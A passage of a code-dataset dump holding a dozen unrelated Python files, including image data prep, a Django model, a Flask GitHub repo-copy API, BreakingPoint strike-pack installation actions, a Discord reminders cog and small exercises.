options(object):\r\n# pass\r\n# \r\n# opt = options()\r\n# opt.in_dir = 'C:/Users/larun/Desktop/Data Science Core/Projects/Urology/Image-analysis/test-dir/'\r\n# opt.contrast = 0\r\n# \r\n# pickle_files = get_pickle_files(opt.in_dir)\r\n# \r\n# file = pickle_files[0]\r\n# #for file in pickle_files:\r\n# us_seq = load_us_seq(file,opt)\r\n# \r\n# get_out_file_name(file)\r\n# \r\n# for k in range(len(us_seq)):\r\n# view_sample_images(us_seq[k])\r\n# \r\n# training_df = get_training_samples(us_seq)\r\n# \r\n# training_df.label[200]\r\n# plot_triads(training_df.triad[200])\r\n# =============================================================================\r\n\r\n# =============================================================================\r\n#class options(object):\r\n# pass\r\n## \r\n#opt = options()\r\n#opt.in_dir = 'C:/Users/larun/Desktop/Data Science Core/Projects/Urology/Image-analysis/test-dir/'\r\n#opt.contrast = 2\r\n#opt.train_dir = 'C:/Users/larun/Desktop/Data Science Core/Projects/Urology/Image-analysis/triad/training-dir/'\r\n#opt.test_dir = 'C:/Users/larun/Desktop/Data Science Core/Projects/Urology/Image-analysis/triad/test-dir/'\r\n## \r\n#pickle_files = get_pickle_files(opt.in_dir)\r\n## \r\n#train_test_split = train_test_assg(len(pickle_files))\r\n# \r\n# i = 0 \r\n# for file in pickle_files:\r\n# train_vs_test = train_test_split[i] \r\n# us_seq = load_us_seq(file,opt)\r\n# training_df = get_training_samples(us_seq) \r\n# if train_vs_test == \"train\":\r\n# out_file = os.path.join(opt.train_dir,get_out_file_name(file,group = \"train\"))\r\n# os.makedirs(os.path.dirname(out_file), exist_ok=True)\r\n# training_df.to_pickle(out_file)\r\n# elif train_vs_test == \"test\":\r\n# out_file = os.path.join(opt.test_dir,get_out_file_name(file,group = \"test\"))\r\n# os.makedirs(os.path.dirname(out_file), exist_ok=True)\r\n# training_df.to_pickle(out_file)\r\n# i=i+1\r\n# \r\n# =============================================================================\r\n","sub_path":"1.Models/triad_model/data-prep/preparing-data-for-triad-model.py","file_name":"preparing-data-for-triad-model.py","file_ext":"py","file_size_in_byte":8695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"62278119","text":"'''\n\nExercício Python 052:\nFaça um programa que lê um número inteiro e se tiver 2 e apenas 2 divisores, mostra\nque é primo, senão, mostra que não é primo.\n\n'''\n\ncont = 1\ndiv = 0\nInput = int(input('Fale um número: '))\nwhile True:\n if Input % cont == 0:\n div += 1\n cont += 1\n if cont > Input or div > 2:\n break\n\nif div == 2:\n print('O número é primo')\nelse:\n print('O número não é primo')\n","sub_path":"refazendo/ex052 - ok.py","file_name":"ex052 - ok.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"14988828","text":"#django \nfrom django.db import models\nfrom django.contrib.auth.models import User\n\nclass Administradores(models.Model):\n usuario=models.OneToOneField(User,on_delete=models.CASCADE)\n telefono=models.CharField(max_length=20, blank=True)\n fotoPerfil=models.ImageField(upload_to='usuarios/fotoPerfiles',blank=True,null=True)\n creacion=models.DateTimeField(auto_now_add=True)\n modificacion=models.DateTimeField(auto_now=True)\n\ndef __str__(self):\n return self.usuario.username\n","sub_path":"usuarios/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"413304551","text":"import os\nimport shutil\nimport datetime\nimport argparse\nimport sys\nsys.path.insert(0, '.')\n\nfrom scraper import image as image_scraper\nfrom scripts import build_metadata\n\ndef remove_folders(folders):\n print('=========================================')\n for folder in folders:\n print('Removing folder: {}'.format(folder))\n if os.path.exists(folder):\n shutil.rmtree(folder)\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Download images given topics and URL sources.')\n\n parser.add_argument(\"--keywords\", help='keywords file path', required=True)\n parser.add_argument(\"--sources\", help='urls file path', required=True)\n\n parser.add_argument(\"--image_directory\", help='downloads/ subfolder', default='')\n parser.add_argument(\"--n_images\", help='number of images per topic per source', default=15)\n parser.add_argument(\"--cleanup\", help='if remove download and logs folder', default='false')\n parser.add_argument(\"--metadata\", help='if save metadata file', default='false')\n\n args = parser.parse_args()\n\n # Remove output folders\n # downloads - images\n # logs - metadata\n\n if args.cleanup.lower() == 'true':\n remove_folders(['downloads', 'logs'])\n\n # Retrieve list of topics from config folder\n keyword_file_path = os.path.join(args.keywords)\n image_source_file_path = os.path.join(args.sources)\n n_images = args.n_images\n image_directory = args.image_directory\n\n with open(keyword_file_path, 'r') as infile:\n keywords = infile.readlines()\n\n with open(image_source_file_path, 'r') as infile:\n image_sources = infile.readlines()\n\n keywords = image_scraper.clean_keyword(keywords)\n image_sources = image_scraper.clean_source(image_sources)\n\n start_time = datetime.datetime.now()\n\n image_scraper.scrape(keywords=keywords,\n sources=image_sources,\n n_images=n_images,\n image_directory=image_directory)\n\n end_time = datetime.datetime.now()\n elapsedTime = end_time - start_time\n\n print()\n print()\n print('Number of minutes and seconds elapsed: {}'.format(divmod(elapsedTime.total_seconds(), 60)))\n print()\n print()\n\n if args.metadata.lower() == 'true':\n print('Saving metadata file to folder: {}'.format(image_directory))\n build_metadata.build_metadata(logs_folder='logs', output_folder=image_directory)\n","sub_path":"scripts/scrape_images.py","file_name":"scrape_images.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"68796854","text":"from flask import Blueprint\nfrom flask_restful import Api, Resource, abort, reqparse, request\nfrom server import app, logger\nfrom flask.json import jsonify\nimport json\nimport requests\nfrom github import Github, GithubException\n\nfrom server.utils.utils import getAllFilesWPathsInDirectory\n\nDEFAULT_DIRS_TO_AVOID = set(['./.git', './env', './node_modules', './server/static/javascript', './.profile.d', './.heroku'])\nDEFAULT_EXTENSIONS_TO_AVOID = set(['pyc', 'log', 'python_history'])\n\ngithub_api = Api(Blueprint('github_api', __name__))\n\n@github_api.resource('/authenticate')\nclass Fetch_Github_Auth_Token(Resource):\n\n def post(self):\n\n token_url = 'https://github.com/login/oauth/access_token'\n\n data = {\n 'client_id': app.config.get('GITHUB_CLIENT_ID'),\n 'client_secret': app.config.get('GITHUB_CLIENT_SECRET'),\n 'code': self.code,\n }\n headers = {\n 'Accept': 'application/json'\n }\n\n resp = requests.post(token_url, data=data, headers=headers)\n\n return resp.json()\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('code', type=str, required=True, location='args')\n\n self.args = self.reqparse.parse_args()\n self.code = self.args.get('code')\n\n super(Fetch_Github_Auth_Token, self).__init__()\n\n\n@github_api.resource('/copy-app-to-repo')\nclass Copy_App_To_New_Repo(Resource):\n\n def post(self):\n\n repo_name = self.repo_name\n\n g = Github(self.token)\n\n # Since creating a repo happens on the user obejct, we must fetch the user first.\n user = g.get_user()\n user_login = user.login\n\n # Try to create the repo. Creation will fail if a repo has already been created with that name.\n try:\n logger.debug('Trying to create new repo with name: {}'.format(repo_name))\n repo = user.create_repo(repo_name)\n new_repo_name = repo.name\n # If we fail to create a repo, we check to see if it was because there was already one with that name\n except GithubException as repo_creation_error:\n data = {\n 'repoName': repo_name,\n }\n return handleGithubError(repo_creation_error, data=data)\n\n # If we successfully created the repo, then we can prep all files in this app to add to the repo.\n files = getAllFilesWPathsInDirectory('.', dirsToAvoid=DEFAULT_DIRS_TO_AVOID, extensionsToAvoid=DEFAULT_EXTENSIONS_TO_AVOID)\n files_added_successfully = []\n files_failed = []\n\n for i, file_path in enumerate(files):\n\n # Try to read the file's content.\n try:\n with open(file_path, 'rb') as file:\n file_content = file.read()\n except IOError as e:\n files_failed.append(file_path_formatted)\n continue\n\n file_path_formatted = file_path[2:]\n commit_message = 'Committing file {file_num} of {num_files} for {user_login} to {repo_name}: {file_path}'.format(file_num=i+1, num_files=len(files), user_login=user_login, repo_name=new_repo_name, file_path=file_path_formatted)\n\n logger.debug(commit_message)\n\n try:\n # Ideally Github would allow us to add our files in batches, rather than one at a time,\n # so that we can reduce the number of API calls required. However, based on this\n # dicsussion, it does not appear to be possible. https://github.com/isaacs/github/issues/199\n\n repo.create_file(file_path_formatted, commit_message, file_content)\n files_added_successfully.append(file_path_formatted)\n except GithubException as e:\n errorMessage = e.args[1].get('message')\n files_failed.append(file_path_formatted)\n\n results = {\n 'repoName': new_repo_name,\n 'successfullyAdded': files_added_successfully,\n 'failed': files_failed,\n }\n\n return results\n\n\n def __init__(self):\n self.reqparse = reqparse.RequestParser()\n self.reqparse.add_argument('token', required=True, location='json')\n self.reqparse.add_argument('repoName', required=True, location='json')\n\n self.args = self.reqparse.parse_args()\n self.token = self.args.get('token')\n self.repo_name = self.args.get('repoName')\n\n super(Copy_App_To_New_Repo, self).__init__()\n\n\n\ndef handleGithubError(error, data={}):\n status = error.args[0]\n errorData = error.args[1]\n\n resp = {\n 'data': data,\n 'error': errorData,\n }\n\n logger.debug('Received GitHub Error with Status {status}. Error: {errorData}'.format(status=status, errorData=errorData))\n return resp, status\n","sub_path":"server/api/githubApi.py","file_name":"githubApi.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"147552393","text":"# Runtime 156 ms\n# Beats 69%\nclass Solution:\n def multiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n if num1 == '0' or num2 == '0':\n return '0'\n \n rst = [0] * (len(num1) + len(num2))\n for i, m in enumerate(num1[::-1]):\n for j, n in enumerate(num2[::-1]):\n rst[i+j] += (int(m) * int(n))\n\n # 注意进位处理\n for i in range(len(rst)):\n if rst[i] >= 10:\n rst[i+1] += rst[i] // 10\n rst[i] %= 10\n \n # m 位数字 x n 位数字,结果 m + n 位,但是首位有可能是 0\n return ''.join(map(str, rst))[::-1] if rst[-1] else ''.join(map(str, rst[:-1]))[::-1]\n","sub_path":"43-Multiply-Strings/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"185229394","text":"\"\"\"\n===================\nCompare PAC methods\n===================\n\nCompute PAC on multiple datasets and compare implemented methods.\n\"\"\"\nfrom __future__ import print_function\nimport matplotlib.pyplot as plt\nfrom tensorpac.utils import pac_signals_tort\nfrom tensorpac import Pac\nplt.style.use('seaborn-paper')\n\n# First, we generate a dataset of signals artificially coupled between 10hz\n# and 100hz. By default, this dataset is organized as (ntrials, npts) where\n# npts is the number of time points.\nn = 10 # number of datasets\nsf = 256. # sampling frequency\nnpts = 3000 # Number of time points\ndata, time = pac_signals_tort(sf=sf, fpha=[4, 6], famp=[90, 110], noise=3,\n ntrials=n, dpha=10, damp=10, npts=npts)\n\n# First, let's use the MVL, without any further correction by surrogates :\np = Pac(fpha=(1, 10, 1, .1), famp=(60, 140, 1, 1), dcomplex='wavelet',\n width=6)\n\n# Now, we want to compare PAC methods, hence it's useless to systematically\n# filter the data. So we extract the phase and the amplitude only once :\nphases = p.filter(sf, data, axis=1, ftype='phase')\namplitudes = p.filter(sf, data, axis=1, ftype='amplitude')\n\nplt.figure(figsize=(18, 9))\nfor i, k in enumerate([1, 2, 3, 4, 5]):\n # Change the pac method :\n p.idpac = (k, 0, 0)\n print('-> PAC using ' + str(p))\n # Compute only the PAC without filtering :\n xpac = p.fit(phases, amplitudes, axis=2)\n # Plot :\n plt.subplot(2, 3, k)\n p.comodulogram(xpac.mean(-1), title=p.method, cmap='Spectral_r')\n\nplt.show()\n","sub_path":"examples/plot_pac_methods.py","file_name":"plot_pac_methods.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"34960925","text":"from sklearn import tree\nfrom classifiers.classifier import Classifier\n\ncriterion = {0: \"gini\", 1: \"entropy\"}\n\n\nclass DecisionTree(Classifier):\n\n chosen_criterion = criterion[0]\n max_depth = None\n max_leaf_nodes = None\n\n name = \"Decision trees algorithm\"\n\n def __init__(self, data, lr, labels, training_fraction, arguments):\n super().__init__(data, lr, labels, training_fraction, arguments)\n\n try:\n self.chosen_criterion = criterion[arguments[0]]\n self.max_depth = int(arguments[1])\n self.max_leaf_nodes = int(arguments[2])\n self.model = tree.DecisionTreeClassifier(criterion=self.chosen_criterion,\n max_depth=self.max_depth,\n max_leaf_nodes=self.max_leaf_nodes)\n except:\n self.model = tree.DecisionTreeClassifier()\n\n def print_stats(self, dataset_name, basic=True):\n print(f\"Criterion:\\t\\t\\t{self.chosen_criterion}\")\n print(f\"Max depth:\\t\\t\\t{self.max_depth}\")\n print(f\"Max leaf nodes:\\t\\t\\t{self.max_leaf_nodes}\")\n print(self.get_metrics())\n","sub_path":"Zadanie1/classifiers/decisionTree.py","file_name":"decisionTree.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"163379899","text":"# -*- coding: utf-8 -*-\nfrom gevent import monkey\nmonkey.patch_all()\nimport random, datetime\nimport gevent\nfrom gevent.queue import Queue\nfrom pymongo import MongoClient\n\n\n\ndef get_collection(collection_key):\n global gClientMongo\n ret = None\n collection = None\n client, db = None, None\n host, port = 'localhost', 27017\n client = MongoClient(host, port)\n db = client['sensor_log']\n if not collection_key in db.collection_names(False):\n ret = db.create_collection(collection_key)\n else:\n ret = db[collection_key]\n return ret\n\ndef build_queue():\n queue = Queue(maxsize=10000)\n for i in range(queue.maxsize):\n o = {}\n o['device_id'] = 'aaaaaaaaaaaaa'\n o['sensor_id'] = 'AHRS_MPU6050'\n o['timestamp'] = datetime.datetime.now()\n o['value'] = {'temperature':'%.2f' % random.triangular(24.0, 27.0)}\n queue.put(o)\n return queue\n\n\ndef test():\n device_id = 'AHRS'\n today = datetime.datetime.now().strftime(\"%Y%m%d\")\n collection_name = 'sensor_log_%s_%s' % (device_id, today)\n collection = get_collection(collection_name)\n q = build_queue()\n print ('before qsize=%d' % q.qsize())\n # collection.insert_many(q.queue)\n q.queue.clear()\n print ('after qsize=%d' % q.qsize())\n\n\n\ndef main():\n i = 0.0\n while True:\n print(i)\n i += 1.0\n gevent.sleep(1.0)\n\nif __name__ == '__main__':\n m = gevent.spawn(main)\n t = gevent.spawn_later(3, test)\n gevent.joinall([m, t])\n\n\n","sub_path":"test/test_mongo.py","file_name":"test_mongo.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"327924477","text":"import tkinter as tk\n\nwindow = tk.Tk()\n\n# sets the window size to 500px x 300px\nwindow.geometry(\"500x300\")\nwindow.title('Window Title')\n\npython = tk.BooleanVar()\ncplusplus = tk.BooleanVar()\n# create a new checkbutton\npython_checkbox = tk.Checkbutton(text=\"Python\", variable=python)\ncplusplus_checkbox = tk.Checkbutton(text=\"C++\", variable=cplusplus)\n\nlabel = tk.Label(text=\"Hello World\",\n width=10, # width of 10 'o'\n height=10, # height of 10 'o'\n foreground=\"white\", # text color\n background=\"black\") # background color\n\nlabel.text = f''\n\npython_checkbox.pack()\ncplusplus_checkbox.pack()\nlabel.pack()\n\nwindow.mainloop()\n","sub_path":"checkbutton.py","file_name":"checkbutton.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"56507758","text":"#/usr/bin/env python3\n\n'''\nUpdate the how-to-bingewatch-class-who-skipwatch.md script and then\nrun pandoc to create all of the index-...html files.\n\nUsage:\n python3 update.py\n'''\n\nimport io\nimport json\nimport sys\nfrom pprint import pprint\nimport Levenshtein # py -3 -m pip install --user \"python-Levenshtein\"\n\nMD = \"how-to-bingewatch-class-who-skipwatch.md\"\nJS = json.load(open(\"doctor-who-classic-list.json\", \"r\"))\n\ndef check_in_andys_list(line, andysWatches):\n for aw in andysWatches:\n found = line.find(aw)\n if found >=0:\n return True\n return False\n\ndef ClosestMatch(episode, JS):\n ix = episode.find(\"(\")\n if ix>=0: episode = episode[0:ix]\n total = [(x[\"Title\"], x) for x in JS]\n total = [(Levenshtein.distance(episode, x), y) for x, y in total]\n total = sorted(total, key=lambda x: x[0])\n x = total[0][1]\n #if total[0][0] > 1: print(episode, total[0])\n return \"Story {}; {} episodes - {}\".format(x[\"Story\"], x[\"Episodes\"], x[\"Title\"])\n\ndef main():\n from update import ANDYS_WATCHES \n\n with open(MD + \".base\", \"rb\") as f:\n #lines = f.read().decode('cp1252', errors='backslashreplace').splitlines()\n lines = f.read().decode('utf-8').splitlines()\n\n def EndLast(last_info, fw):\n if last_info==None:\n return None\n print(last_info, file=fw)\n print('', file=fw)\n return None\n\n last_info = None\n\n with io.open(MD, \"w\", encoding='utf-8', newline='\\n') as fw:\n season = \"???\"\n for line in lines:\n if line.startswith(\"# Season\"):\n last_info = EndLast(last_info, fw)\n season = \"\" + line[2:].strip() + \"\"\n print(line, file=fw)\n print(line.replace(\"# \", \"\\n## Summary - \"), file=fw)\n continue\n # ...\n if line.startswith(\"## \"):\n last_info = EndLast(last_info, fw)\n line_stripped = line[3:]\n line_stripped = line_stripped \\\n .replace(\" - Maybe\", \"\") \\\n .replace(\" - Watch\", \"\") \\\n .replace(\" - Essential\", \"\") \\\n .replace(\" - Skip\", \"\")\n if check_in_andys_list(line, ANDYS_WATCHES):\n line += \" - AW\"\n last_info = ClosestMatch(line_stripped, JS)\n print(line, file=fw)\n print('', file=fw)\n print(season, file=fw)\n continue\n # ...\n print(line, file=fw)\n # ...\n last_info = EndLast(last_info, fw)\n\nif __name__=='__main__':\n main()\n import pandocize\n pandocize.main(sys.argv[0:1] + [\"all\"])\n\nANDYS_WATCHES = (\n \"The War Games\",\n)","sub_path":"doctor-who-list/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"647296435","text":"fruits = [\"apples\", \"pears\", \"oranges\", \"peaches\"]\ndef fruit_loops(x):\n b = 0\n b2 = 0\n for i in x:\n c = (((str(b + 1) + \".\") + x[b]))\n print(c[::-1])\n b += 1\n x.pop()\n for i in x:\n print(((str(b2 + 1) + \".\") + x[b2]))\n b2 += 1\n\nfruit_loops(fruits)","sub_path":"students/Tommy Aguilu/list_lab_04.py","file_name":"list_lab_04.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"213578427","text":"\nclass Solution(object):\n def findLength(self, A, B):\n \"\"\"\n :type A: List[int]\n :type B: List[int]\n :rtype: int\n \"\"\"\n m, n = len(A), len(B)\n d = [[0] * m for _ in range(n)]\n maxlen = 0\n for i in range(m):\n for j in range(n):\n if A[i] == B[j]:\n if i == 0 or j == 0:\n d[i][j] = 1\n else:\n d[i][j] = d[i-1][j-1] + 1\n maxlen = max(maxlen, d[i][j])\n return maxlen\n\n\nif __name__ == '__main__':\n s = Solution()\n tests = [\n (\n [1,2,3,2,1],\n [3,2,1,4,7]\n )\n ]\n for a, b in tests:\n print(s.findLength(a, b))","sub_path":"718_maximum_length_of_repeated_subarray.py","file_name":"718_maximum_length_of_repeated_subarray.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"273963359","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport re\n\nfrom bp_controller.command_templates import install_strikes\nfrom cloudshell.cli.command_template.command_template_executor import CommandTemplateExecutor\n\n\nclass InstallStrikePackActions(object):\n TIMEOUT = 600\n\n def __init__(self, cli_service, logger):\n \"\"\" Strike pack installation actions\n\n :param cli_service: default mode cli_service\n \"\"\"\n\n self._cli_service = cli_service\n self._logger = logger\n\n def get_strike_pack_version(self, conn_name=\"bps\"):\n \"\"\" Get current installed strike pack version \"\"\"\n\n output = CommandTemplateExecutor(self._cli_service,\n install_strikes.GET_STRIKE_PACK_VERSION,\n timeout=self.TIMEOUT).execute_command(conn_name=conn_name)\n\n match = re.search(r\"(?P\\d+)\", output, re.DOTALL)\n\n if not match:\n raise Exception(self.__class__.__name__, \"Strike Pack version determination failed: {}\".format(output))\n\n return match.groupdict().get(\"version\")\n\n def reinit_connection(self, conn_name=\"quali\"):\n \"\"\" Re-initialize BPS Connection installed strike pack version \"\"\"\n\n command = install_strikes.REINIT_CONNECTION.format(conn_name=conn_name,\n login=self._cli_service.session.username,\n password=self._cli_service.session.password)\n\n self._logger.debug(\"Re-init session: {}\".format(command))\n\n output = self._cli_service.send_command(command, timeout=self.TIMEOUT)\n\n self._logger.debug(\"Re-init session finished: {}\".format(output))\n\n # output = CommandTemplateExecutor(self._cli_service,\n # install_strikes.REINIT_CONNECTION).execute_command(conn_name=conn_name,\n # login=self._cli_service.session.username,\n # password=self._cli_service.session.password)\n\n if not re.search(r\"bPSConnection\\d+\", output):\n raise Exception(self.__class__.__name__, \"Re-initialize BPS connection failed: {}\".format(output))\n\n return conn_name\n\n def install_strike_pack(self, strike_pack_url, conn_name=\"bps\"):\n \"\"\" Install strike pack \"\"\"\n\n self._logger.debug(\"Install strike pack: URL - {}, CONN - {}\".format(strike_pack_url, conn_name))\n\n output = CommandTemplateExecutor(self._cli_service,\n install_strikes.INSTALL_STRIKE_PACK,\n timeout=self.TIMEOUT).execute_command(conn_name=conn_name,\n strike_pack_url=strike_pack_url)\n\n self._logger.debug(\"Install strike pack finished: {}\".format(output))\n\n # if not re.search(r\"iluAddLicenseServers ended\", output):\n # raise Exception(self.__class__.__name__, \"Add License Server failed with error: {}\".format(output))\n\n def reload_device(self, timeout=600, conn_name=\"bps\"):\n \"\"\" Reload device\n\n :param timeout: session reconnect timeout\n :param conn_name: BPS connection name\n :param action_map: actions will be taken during executing commands, i.e. handles yes/no prompts\n :param error_map: errors will be raised during executing commands, i.e. handles Invalid Commands errors\n \"\"\"\n\n self._logger.debug(\"Start reload device\")\n try:\n output = CommandTemplateExecutor(self._cli_service,\n install_strikes.REBOOT,\n timeout=self.TIMEOUT).execute_command(conn_name=conn_name)\n\n self._logger.debug(\"Reboot output: {}\".format(output))\n except Exception as e:\n self._logger.debug(\"Connection closed: {}\".format(e))\n pass\n\n self._logger.debug(\"Waiting for session reconnect\")\n self._cli_service.reconnect(timeout)\n","sub_path":"src/bp_controller/actions/install_strike_pack_actions.py","file_name":"install_strike_pack_actions.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"90256247","text":"\"\"\"\nReminders cog. Database backed to ensure persistence between bot restarts.\n\"\"\"\nimport asyncio\nimport datetime\nimport logging\n\nimport discord\nfrom discord.ext import commands\n\nfrom joku.cogs._common import Cog\nfrom joku.core.bot import Context\nfrom joku.core.utils import parse_time\nfrom joku.db.tables import Reminder\n\nlogger = logging.getLogger(\"Jokusoramame.Reminders\")\n\n\nclass Reminders(Cog):\n _is_running_reminders = asyncio.Lock()\n\n _currently_running = {}\n\n async def _fire_reminder(self, reminder: Reminder):\n \"\"\"\n Fires a reminder object to be ran.\n \"\"\"\n # Wrap everything in a try/finally.\n try:\n if reminder.enabled is False:\n # race conditions?\n return\n\n # check to see if the reminder is valid or not\n channel = self.bot.get_channel(reminder.channel_id)\n if channel is None:\n # cancel it\n self.logger.warning(\"Reminder channel was empty - not reminding...\")\n await self.bot.database.cancel_reminder(reminder.id)\n return\n\n guild = channel.guild # type: discord.Guild\n member = guild.get_member(reminder.user_id)\n if not member:\n self.logger.warning(\"Reminder member was dead - not reminding...\")\n await self.bot.database.cancel_reminder(reminder.user_id)\n return\n\n self._currently_running[reminder.id] = True\n\n # lol local time\n time_left = reminder.reminding_at.timestamp() - datetime.datetime.utcnow().timestamp()\n # sleep for that many seconds before waking up and sending the messages.\n await asyncio.sleep(time_left)\n\n # send the reminder\n try:\n await channel.send(\":alarm_clock: {}, you wanted to be reminded of: `{}`\".format(member.mention,\n reminder.text))\n except discord.HTTPException:\n logger.warning(\"Failed to send reminder `{}`!\".format(reminder.id))\n finally:\n # todo: repeating reminders\n reminder.enabled = False\n\n # mark it as disabled\n if reminder.enabled is False:\n await self.bot.database.cancel_reminder(reminder.id)\n\n finally:\n self._currently_running.pop(reminder.id, None)\n\n async def ready(self):\n if self._is_running_reminders.locked():\n return\n\n async with self._is_running_reminders:\n while True:\n # Scan the reminders firing in the next 300 seconds.\n reminders = await self.bot.database.scan_reminders(within=300)\n for reminder in reminders:\n self.bot.loop.create_task(self._fire_reminder(reminder))\n\n # Sleep for 300 seconds afterwards.\n await asyncio.sleep(300)\n\n @commands.command()\n async def remind(self, ctx: Context, tstr: str, *, content: str):\n \"\"\"\n Sets a reminder to be ran in the future.\n \"\"\"\n _ = parse_time(tstr, seconds=False)\n if _ is None:\n await ctx.send(\":x: Invalid time string.\")\n return\n\n dt, seconds = _\n\n content = content.replace(\"`\", \"´\").replace(\"@everyone\", \"@\\u200beveryone\").replace(\"@here\", \"@\\u200bhere\")\n\n reminder = await ctx.bot.database.create_reminder(ctx.channel, ctx.author, content,\n remind_at=dt)\n if seconds < 300:\n # make the reminder immediately.\n t = self.bot.loop.create_task(self._fire_reminder(reminder))\n else:\n t = asyncio.sleep(0)\n\n em = discord.Embed(title=\"Remembering things so you don't have to\")\n em.description = content\n em.set_footer(text=\"Reminding at: \")\n em.timestamp = dt\n\n await ctx.send(embed=em)\n await t\n\n\nsetup = Reminders.setup\n","sub_path":"joku/cogs/games/reminders.py","file_name":"reminders.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"237124034","text":"\"\"\"\n26. Remove Duplicates from Sorted Array\n\nGiven an integer array nums sorted in non-decreasing order, remove the duplicates in-place such that each unique element appears only once. The relative order of the elements should be kept the same.\n\nSince it is impossible to change the length of the array in some languages, you must instead have the result be placed in the first part of the array nums. More formally, if there are k elements after removing the duplicates, then the first k elements of nums should hold the final result. It does not matter what you leave beyond the first k elements.\n\nReturn k after placing the final result in the first k slots of nums.\n\nDo not allocate extra space for another array. You must do this by modifying the input array in-place with O(1) extra memory.\n\nExample 1:\n\nInput: nums = [1,1,2]\nOutput: 2, nums = [1,2,_]\nExplanation: Your function should return k = 2, with the first two elements of nums being 1 and 2 respectively.\nIt does not matter what you leave beyond the returned k (hence they are underscores).\nExample 2:\n\nInput: nums = [0,0,1,1,1,2,2,3,3,4]\nOutput: 5, nums = [0,1,2,3,4,_,_,_,_,_]\nExplanation: Your function should return k = 5, with the first five elements of nums being 0, 1, 2, 3, and 4 respectively.\nIt does not matter what you leave beyond the returned k (hence they are underscores).\n\"\"\"\n\nfrom typing import List\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n index = 0\n\n while index < len(nums):\n if index + 1 < len(nums):\n if nums[index] == nums[index + 1]:\n nums.pop(index + 1)\n print(nums, index)\n else:\n index += 1\n else:\n break\n\n return index + 1\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n duplicates = 0\n\n for i in range(1, len(nums)):\n if nums[i] == nums[i - 1]:\n duplicates += 1\n else:\n nums[i - duplicates] = nums[i]\n\n return len(nums) - duplicates\n\nSolution().removeDuplicates([0,0,1,1,1,2,2,3,3,4])","sub_path":"26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"607662876","text":"# Given an array of integers greater than zero, find if it is possible to split it in two subarrays (without reordering the elements), such that the sum of the two subarrays is the same. Print the two subarrays.\n\ndef equal_sum1(arr):\n\tleft_sum = 0\n\n\tfor i in range(len(arr)):\n\t\tleft_sum += arr[i]\n\n\tright_sum = 0\n\tfor i in range(len(arr) - 1, -1, -1):\n\t\tright_sum += arr[i]\n\n\t\tleft_sum -= arr[i]\n\n\t\tif right_sum == left_sum:\n\t\t\treturn True\n\n\treturn False\n\n\ndef equal_sum(arr):\n\tleft_sum = 0\n\ths = {}\n\n\tfor i in range(len(arr)):\n\t\tleft_sum += arr[i]\n\t\tif left_sum not in hs:\n\t\t\ths[left_sum] = i\n\n\tprint(left_sum)\n\tprint(hs)\n\tif (left_sum // 2) in hs:\n\t\treturn True\n\treturn False\n\nprint(equal_sum([4, 1, 2, 3]))\nprint(equal_sum([1, 2, 3, 4, 5, 5]))\nprint(equal_sum([4, 3, 2, 1]))\n\n\t","sub_path":"Facebook/EqualSumSubarrays.py","file_name":"EqualSumSubarrays.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"98982744","text":"vowels = ['a', 'e', 'i', 'o', 'u']\nword = \"swaroop\"\nfound = []\nprint(\"looking for vowels in word:\", word)\nfor l in word:\n if l in vowels:\n if l not in found:\n found.append(l)\nif len(found) > 0:\n print(\"Found below vowels\")\n for v in found:\n print(v)\nelse:\n print(\"No vowels found in word:\", word)\n","sub_path":"chapter-2/vowels2.py","file_name":"vowels2.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"268049232","text":"# -*- coding:utf-8 -*-\n\nimport tensorflow as tf\n\nclass ASR_Model():\n\n def __init__(self, class_num):\n ''''----------------------------------------------------------------------------------------------------------------------------------'''\n\n self.Conv2D_1 = tf.keras.layers.Conv2D(\n 32, kernel_size=(2, 2),\n padding='same', 